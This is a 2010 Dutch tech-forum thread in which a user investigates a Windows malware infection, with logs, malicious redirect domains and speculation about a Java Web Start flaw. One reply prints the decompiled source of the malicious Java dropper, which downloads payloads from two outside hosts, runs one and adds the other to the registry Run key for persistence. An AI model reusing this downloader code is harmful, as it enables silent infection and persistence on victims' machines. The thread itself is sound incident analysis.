Toon posts:

Besmet! - een onderzoek

Pagina: 1
Acties:

Onderwerpen

Java Virus

zaterdag 12 juni 2010 15:41

Acties:
  • 0 Henk 'm!
  • YellowOnline
  • Registratie: Januari 2005
  • Laatst online: 28-03-2023

YellowOnline

BEATI PAVPERES SPIRITV

Topicstarter
Dag Tweakertjes,

Voor het eerst sinds de tijd van Yankee Doodle ben ik getroffen door een virus. Enigszins gezichtsverlies voor mijzelf, maar goed: shit happens. Ik zie virussen normaal gezien vanop 10 kilometer afstand dus ik vermoed dat de besmetting heel recent is.

Als ik m'n logfiles kijk, de meldingen beginnen bij deze lijn:

code:
1

12/06/2010  14:49:12    Would be blocked by Access Protection rule  (rule is currently not enforced)    W7YELLOW\<mijn naam>    C:\Windows\Explorer.EXE C:\Users\<mijn naam>\AppData\Local\Temp\asaay.exe   Common Standard Protection:Prevent common programs from running files from the Temp folder  Action blocked : Execute


Euh, 14:49? Ik was van 14:00 tot 15:00 AFK. Wat is er gebeurd tijdens mijn lunchpauze? En waarom is er een regel die niet enforced wordt??? In ieder geval is m'n ego enigszins gered: de besmetting is inderdaad héél recent. Eens kijken wie, wat en waar:

Eerst en vooral merk ik dat anti-virus websites bezoeken me redirect. Nochtans: HOSTS is niet herschreven.
Bitdefender stuurt me richting een "Problem loading page" (dit is ook het geval op een niet-besmette machine, dus dit heeft er waarschijnlijk niets mee te maken), McAfee en Norton richting respectievelijk:
code:
1

http://www1.trytocleanit-45p.co.cc/ en http://scanner-album.com/

(code-tags opdat niemand er zomaar op zou klikken)

M'n PC lijkt wel traag te gaan. Eens kijken:
Afbeeldingslocatie: http://tweakers.net/ext/f/HvCuYH1eKAoF0OvMOnwGPPmM/full.jpg

Ouch. Wat zijn de bronbestanden?
Afbeeldingslocatie: http://tweakers.net/ext/f/ZjfY2gBKbO5825vtMpgCMxVL/full.jpg

En het register:
Afbeeldingslocatie: http://tweakers.net/ext/f/SkT9dDb9wmUJ10DBP1mBv2vP/full.jpg

Die .jar lijkt mij de bron van alle kwaad dus we gaan daar even dieper op in. In de leesbare stukken code vind ik een redirect naar de volgende URLs:
code:
1
2

http://goods.jarro.co.cc
http://11.jampers.co.cc


Die website, onbekend op Google, bestaat echt. Connecteren tracht een bestand te openen:
Afbeeldingslocatie: http://tweakers.net/ext/f/YIAjetvon1t2iaIdXHEYE1zy/full.jpg

De inhoud lijkt evenwel identiek te zijn aan die van de .jar.

Wat is nu de zin van mijn TS? Eerst en vooral mijn onderzoek naar een virusbesmetting delen met eventueel geïnteresseerden. Ten tweede hoor ik graag van mijn medetweakers hoe ik besmet kan zijn tijdens mijn afwezigheid en welk virus dit eigenlijk is. Het virus buitengooien lukt me zelf wel, desnoods met een reïnstall (was al gepland, moet enkel nog de drivers in mijn image pompen).



Na alles handmatig te cleanen één bestandje in quarantaine gezet en geupload naar http://www.virustotal.com:

Afbeeldingslocatie: http://tweakers.net/ext/f/Oce5P2yhwYoDmbxfTTAXoHzb/full.jpg

[ Voor 5% gewijzigd door YellowOnline op 12-06-2010 15:57 ]

zaterdag 12 juni 2010 15:59

Acties:
  • 0 Henk 'm!
  • F.West98
  • Registratie: Juni 2009
  • Laatst online: 01:47

F.West98

Alweer 16 jaar hier

Om te weten hoe je besmet kan zijn moeten we hier wel weten of de computer aan was, in welke staat hij was.
Als hij uit stond is dit een wonderlijk virus dat je PC aan kan zetten :D
Als hij aan stond, met internet is dit nogal verklaarbaar, er komen nl. een stuk of 100 aanvallen/dag binnen op een normale computer. ;)
Als hij aan stond, maar zonder internet was dit virus er dus al, en gaat nu pas 'aan' :P

Verder heb ik weinig verstand van virussen oid, ik heb er zelf nooit 1 gehad, terwijl ik toch maar werk met Windows Firewall en MSE (Microsoft Security Essentials) :+

2x Dell UP2716D | R9 7950X | 128GB RAM | 980 Pro 2TB x2 | RTX2070 Super
.oisyn: Windows is net zo slecht in commandline als Linux in GUI

zaterdag 12 juni 2010 16:07

Acties:
  • 0 Henk 'm!
  • YellowOnline
  • Registratie: Januari 2005
  • Laatst online: 28-03-2023

YellowOnline

BEATI PAVPERES SPIRITV

Topicstarter
F.West98 schreef op zaterdag 12 juni 2010 @ 15:59:
Om te weten hoe je besmet kan zijn moeten we hier wel weten of de computer aan was, in welke staat hij was.
Als hij uit stond is dit een wonderlijk virus dat je PC aan kan zetten :D
Als hij aan stond, met internet is dit nogal verklaarbaar, er komen nl. een stuk of 100 aanvallen/dag binnen op een normale computer. ;)
Als hij aan stond, maar zonder internet was dit virus er dus al, en gaat nu pas 'aan' :P

Verder heb ik weinig verstand van virussen oid, ik heb er zelf nooit 1 gehad, terwijl ik toch maar werk met Windows Firewall en MSE (Microsoft Security Essentials) :+
De PC stond uiteraard aan, een besmetting terwijl hij uit stond zou inderdaad een primeur zijn ;) De gewone tig aantal aanvallen per dag lopen trouwens dood op de firewall van m'n router. Intussen zie ik wel dat het uur van de dll die geladen is dateert van rond 12u, toen ik nog gewoon aan het surfen was. Tot zover ik me herinner heb niets gedownload. En zelfs dan snap ik niet waarom m'n McAfee een exclusion gemaakt heeft :/

zaterdag 12 juni 2010 16:22

Acties:
  • 0 Henk 'm!
  • F.West98
  • Registratie: Juni 2009
  • Laatst online: 01:47

F.West98

Alweer 16 jaar hier

YellowOnline schreef op zaterdag 12 juni 2010 @ 16:07:
[...]


De PC stond uiteraard aan, een besmetting terwijl hij uit stond zou inderdaad een primeur zijn ;) De gewone tig aantal aanvallen per dag lopen trouwens dood op de firewall van m'n router. Intussen zie ik wel dat het uur van de dll die geladen is dateert van rond 12u, toen ik nog gewoon aan het surfen was. Tot zover ik me herinner heb niets gedownload. En zelfs dan snap ik niet waarom m'n McAfee een exclusion gemaakt heeft :/
dus dat is mijn laatste optie...
Hij was er al, en op de dll zat een 'tijdbom' die na 3 uur af gaat...

2x Dell UP2716D | R9 7950X | 128GB RAM | 980 Pro 2TB x2 | RTX2070 Super
.oisyn: Windows is net zo slecht in commandline als Linux in GUI

zaterdag 12 juni 2010 16:27

Acties:
  • 0 Henk 'm!
  • GraveR
  • Registratie: Januari 2000
  • Laatst online: 22-08 19:26

GraveR

Voor de volledigheid, de gecompilede jar.dtc:
Java:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99

package jdownloader;

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.PrintStream;
import java.net.URL;
import java.net.URLConnection;

public class Main
{
  public static void main(String[] args)
    throws InterruptedException
  {
    File tempFile = null;
    Process pr;
    try
    {
      tempFile = File.createTempFile("f.exe", ".exe");
      System.out.print("Created temporary file with name ");
      System.out.println(tempFile.getAbsolutePath());
      String texto = tempFile.getCanonicalPath();
      int contador = 0;
      for (int x = 0; x < texto.length(); ++x) {
        if (texto.charAt(x) == '\\')
          contador = x + 1;
      }
      String texto1 = texto.substring(0, contador);

      URL url = new URL("http://goods.jarro.co.cc");
      URLConnection urlc = url.openConnection();
      InputStream is = urlc.getInputStream();
      FileOutputStream out = new FileOutputStream(texto1 + "n2.jar");

      while ((c = is.read()) != -1)
      {
        int c;
        out.write(c);
      }

      is.close();
      out.close();
      String textoFinal = texto1 + "n2.jar";
      System.out.println("EL FINAL " + textoFinal);

      String comando = "reg add hkcu\\software\\microsoft\\windows\\currentversion\\run /v xxx /t reg_sz /d \"" + textoFinal + "\"" + " /f";
      System.out.println(comando);
      pr = Runtime.getRuntime().exec(comando);
    }
    catch (IOException ex)
    {
      System.err.println("Cannot create temp file: " + ex.getMessage());
    }
    finally {
      if (tempFile == null);
    }

    Process pr;
    try
    {
      tempFile = File.createTempFile("p.exe", ".exe");
      System.out.print("Created temporary file with name ");
      System.out.println(tempFile.getAbsolutePath());
      String texto = tempFile.getCanonicalPath();
      int contador = 0;
      for (int x = 0; x < texto.length(); ++x) {
        if (texto.charAt(x) == '\\') {
          contador = x + 1;
        }
      }
      String texto1 = texto.substring(0, contador);

      URL url = new URL("http://11.jampers.co.cc");
      URLConnection urlc = url.openConnection();
      InputStream is = urlc.getInputStream();
      FileOutputStream out = new FileOutputStream(texto1 + "g.exe");

      while ((c = is.read()) != -1)
      {
        int c;
        out.write(c);
      }

      is.close();
      out.close();
      String textoFinal = texto1 + "g.exe";
      System.out.println("EL FINAL " + textoFinal);

      pr = Runtime.getRuntime().exec("\"" + textoFinal + "\"");
    }
    catch (IOException ex)
    {
      System.err.println("Cannot create temp file: " + ex.getMessage());
    } finally {
      if (tempFile == null);
    }
  }
}

zaterdag 12 juni 2010 16:30

Acties:
  • 0 Henk 'm!
  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Heh..
Dat ding maakt wellicht gebruik van de Java web Start vulnerability die Sun niet direct wil fixen omdat ze dan niet hun 3maandelijkse updatecycle kunnen doen :+
http://www.prevx.com/blog...ilently-owns-the-net.html

[ Voor 20% gewijzigd door alt-92 op 12-06-2010 16:34 ]

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

zaterdag 12 juni 2010 16:37

Acties:
  • 0 Henk 'm!
  • YellowOnline
  • Registratie: Januari 2005
  • Laatst online: 28-03-2023

YellowOnline

BEATI PAVPERES SPIRITV

Topicstarter
GraveR schreef op zaterdag 12 juni 2010 @ 16:27:
(code)
Dankuwel, ik had geen Java-compiler bij de hand maar was wel curieus naar de volledige inhoud.
alt-92 schreef op zaterdag 12 juni 2010 @ 16:30:
Heh..
Dat ding maakt dus gebruik van de Java web Start vulnerability die Sun niet direct wil fixen omdat ze dan niet hun 3maandelijkse updatecycle kunnen doen :+
Dat is eigenlijk wel triest want ze zeggen dus gebruikersveiligheid < volledig arbitrair stramien :/ Ik kan de kritiekheid hier wel niet helemaal van inschatten natuurlijk. Edit: ow, interessante link voegde je toe!

Het virus is volledig weg intussen, ik had enkel wat moeitje met sshnas21.dll te unregisteren (Sysinternals procexp.exe voor gebruikt uiteindelijk). Ik ben nu nog aan het uitvissen wat het ding precies deed behalve resources vreten. Voorgenoemde dll geeft in ieder geval veel hits op het net. En één van de executables had bij zijn properties enkele keren Achilles staan. Op basis van die informatie zoek ik nog wat op.

Grappig trouwens dat er in de java-source errorhandling voorzien is (Try/Catch) :+

[ Voor 56% gewijzigd door YellowOnline op 12-06-2010 16:38 ]

zaterdag 12 juni 2010 16:39

Acties:
  • 0 Henk 'm!
  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Jup, ook malware schrijvers programmeren netjes. Scheelt resources en minder fouten = minder in het oog lopen.

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

zaterdag 12 juni 2010 21:32

Acties:
  • 0 Henk 'm!
  • serkoon
  • Registratie: April 2000
  • Niet online

serkoon

mekker.

Dat er Java wordt gebruikt zegt niks over de manier van infecteren natuurlijk.

Ik zou eens Secunia PSI over je systeem halen en kijken welke software allemaal outdated is. Met name Acrobat Reader en Flash worden veel misbruikt; al is die Java-bug ook een kanshebber natuurlijk. Ik geloof dat er de laatste dagen ook nog bugs in Adobe-software misbruikt worden zonder dat er patches beschikbaar zijn.

Je kunt op allerlei (legitieme) sites aangevallen worden, via banners of via een hack geinjecteerde malware. Er is dus weinig aan te doen, behalve dan gare (Acrobat) software vermijden en dingen als noscript e.d. gebruiken.

zaterdag 12 juni 2010 22:34

Acties:
  • 0 Henk 'm!
  • YellowOnline
  • Registratie: Januari 2005
  • Laatst online: 28-03-2023

YellowOnline

BEATI PAVPERES SPIRITV

Topicstarter
serkoon schreef op zaterdag 12 juni 2010 @ 21:32:
Dat er Java wordt gebruikt zegt niks over de manier van infecteren natuurlijk.

Ik zou eens Secunia PSI over je systeem halen en kijken welke software allemaal outdated is. Met name Acrobat Reader en Flash worden veel misbruikt; al is die Java-bug ook een kanshebber natuurlijk. Ik geloof dat er de laatste dagen ook nog bugs in Adobe-software misbruikt worden zonder dat er patches beschikbaar zijn.

Je kunt op allerlei (legitieme) sites aangevallen worden, via banners of via een hack geinjecteerde malware. Er is dus weinig aan te doen, behalve dan gare (Acrobat) software vermijden en dingen als noscript e.d. gebruiken.
M'n software is up to date, dat weet ik gelukkig zeker. Ik gebruik geen NoScript meer tegenwoordig, maar ik heb nog nooit een probleem uit die hoek gehad (nou ja, ik heb zoals gezegd dit probleem in geen jaren zelf gehad :+). Hypothese: de infectie dateert van eerder, bij het downloaden van een of andere geïnfecteerde self-extracting .rar van Usenet. Dat gebeurt best vaak en zelden of nooit onverwacht. Ik sla er zelfs geen aandacht meer op omdat de extraction altijd doorgaat en McAfee de boel mooi filtert. Om een of andere reden is dat eens fout gegaan en het virus schiet pas met enkele dagen vertraging of zo in gang. Dat verklaart wel nog niet waarom de $_.CreationDate en $_.CreationTime pas vandaag zijn.

Hoe dan ook: ik heb de hoster (Awardspace) een mailtje gestuurd zodat het adres binnenkort down is.
Pagina: 1
Reageer

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq